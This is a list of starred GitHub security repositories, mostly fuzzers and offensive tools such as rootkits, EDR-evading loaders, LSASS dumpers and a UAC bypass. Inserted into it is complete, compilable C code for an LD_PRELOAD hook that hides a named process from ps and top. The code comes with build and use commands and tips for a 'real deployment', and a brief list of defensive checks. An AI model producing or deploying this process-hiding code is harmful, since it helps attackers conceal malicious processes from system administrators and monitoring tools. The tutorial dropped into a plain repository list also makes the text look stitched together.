Stars
Capturing SSL/TLS plaintext without a CA certificate using eBPF. Supported on Linux/Android kernels for amd64/arm64.
The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!
Terminal based "The Matrix" like implementation
🌴 A collection of Linux, macOS and Windows kernel privilege escalation vulnerabilities, each with a build environment, demo GIF, vulnerability details and a compiled executable (提权漏洞合集: privilege escalation vulnerability collection)
Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).
ret-sync is a set of plugins that helps to synchronize a debugging session (WinDbg/GDB/LLDB/OllyDbg2/x64dbg) with IDA/Ghidra/Binary Ninja disassemblers.
LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 and ARM64)
Tool for injecting a shared object into a Linux process
Hide a process under Linux using an LD_PRELOAD shared library that hooks libc's directory-reading calls (https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/)
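The LD_PRELOAD trick behind that entry, as an added example rather than code from the linked repository or the sysdig post: a shared object that interposes libc's `readdir()`, and while the directory being read is `/proc`, drops every `<pid>` entry whose `/proc/<pid>/comm` equals an assumed hidden name (`HIDDEN_NAME`, here `evil_script.py`). Tools such as `ps` and `top` enumerate `/proc` with `opendir`/`readdir`, so they no longer see the process. The helper names (`is_pid_name`, `comm_matches`, `pid_is_hidden`, `dir_is_proc`) are this example's own.

```c
/* Added example of an LD_PRELOAD readdir() hook that hides one process by name.
 * Build: gcc -shared -fPIC -o libhide.so hide.c -ldl
 * Use:   LD_PRELOAD=./libhide.so ps aux
 */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE            /* for RTLD_NEXT */
#endif
#include <ctype.h>
#include <dirent.h>
#include <dlfcn.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#ifndef RTLD_NEXT
#define RTLD_NEXT ((void *) -1l)   /* glibc's value, in case features.h was seen before _GNU_SOURCE */
#endif

/* Assumed name of the process to hide; /proc/<pid>/comm holds at most 15 characters. */
#define HIDDEN_NAME "evil_script.py"

/* A /proc entry names a process only if it is a non-empty run of decimal digits. */
int is_pid_name(const char *s)
{
    if (*s == '\0')
        return 0;
    for (; *s; s++)
        if (!isdigit((unsigned char) *s))
            return 0;
    return 1;
}

/* Compare one line of /proc/<pid>/comm (trailing newline included) with the hidden name. */
int comm_matches(const char *comm_line, const char *hidden)
{
    size_t n = strcspn(comm_line, "\n");
    return n == strlen(hidden) && strncmp(comm_line, hidden, n) == 0;
}

/* Read /proc/<pid>/comm; 1 if that process should be hidden, 0 otherwise or on any error. */
int pid_is_hidden(const char *pid, const char *hidden)
{
    char path[64], line[64];
    FILE *f;
    int hit;

    snprintf(path, sizeof path, "/proc/%s/comm", pid);
    f = fopen(path, "r");
    if (f == NULL)
        return 0;
    hit = fgets(line, sizeof line, f) != NULL && comm_matches(line, hidden);
    fclose(f);
    return hit;
}

/* Filter only the /proc directory itself: compare device and inode of the open stream with /proc. */
static int dir_is_proc(DIR *dirp)
{
    struct stat d, p;
    if (fstat(dirfd(dirp), &d) != 0 || stat("/proc", &p) != 0)
        return 0;
    return d.st_dev == p.st_dev && d.st_ino == p.st_ino;
}

/* The interposed readdir(): resolve libc's real readdir lazily, then skip matching /proc entries. */
struct dirent *readdir(DIR *dirp)
{
    static struct dirent *(*real_readdir)(DIR *);
    struct dirent *e;
    int filter;

    if (real_readdir == NULL)
        real_readdir = (struct dirent *(*)(DIR *)) dlsym(RTLD_NEXT, "readdir");
    filter = dir_is_proc(dirp);
    while ((e = real_readdir(dirp)) != NULL) {
        if (filter && is_pid_name(e->d_name) && pid_is_hidden(e->d_name, HIDDEN_NAME))
            continue;           /* drop the hidden process and keep iterating */
        return e;
    }
    return NULL;
}
```

Two practical caveats: a binary compiled with `_FILE_OFFSET_BITS=64` resolves `readdir` to `readdir64`, so a real deployment exports a `readdir64` wrapper as well; and static binaries (busybox, a statically linked `ls`) ignore `LD_PRELOAD` entirely, which is also the quickest defensive check, alongside inspecting `LD_PRELOAD` in `/proc/<pid>/environ` and the contents of `/etc/ld.so.preload`. On glibc older than 2.34 the `-ldl` flag is required for `dlsym`.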
A protective and Low Level Shellcode Loader that defeats modern EDR systems.
This Repository aims at giving a basic idea about Kernel Exploitation.
MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly.
Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind
mboehme / aflfast
Forked from mirrorer/afl. AFLFast (extends AFL with Power Schedules)
A variant of Gargoyle for x64 to hide memory artifacts using ROP only and PIC
UAFuzz: Binary-level Directed Fuzzing for Use-After-Free Vulnerabilities
A Visual Studio template used to create Cobalt Strike BOFs
This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification.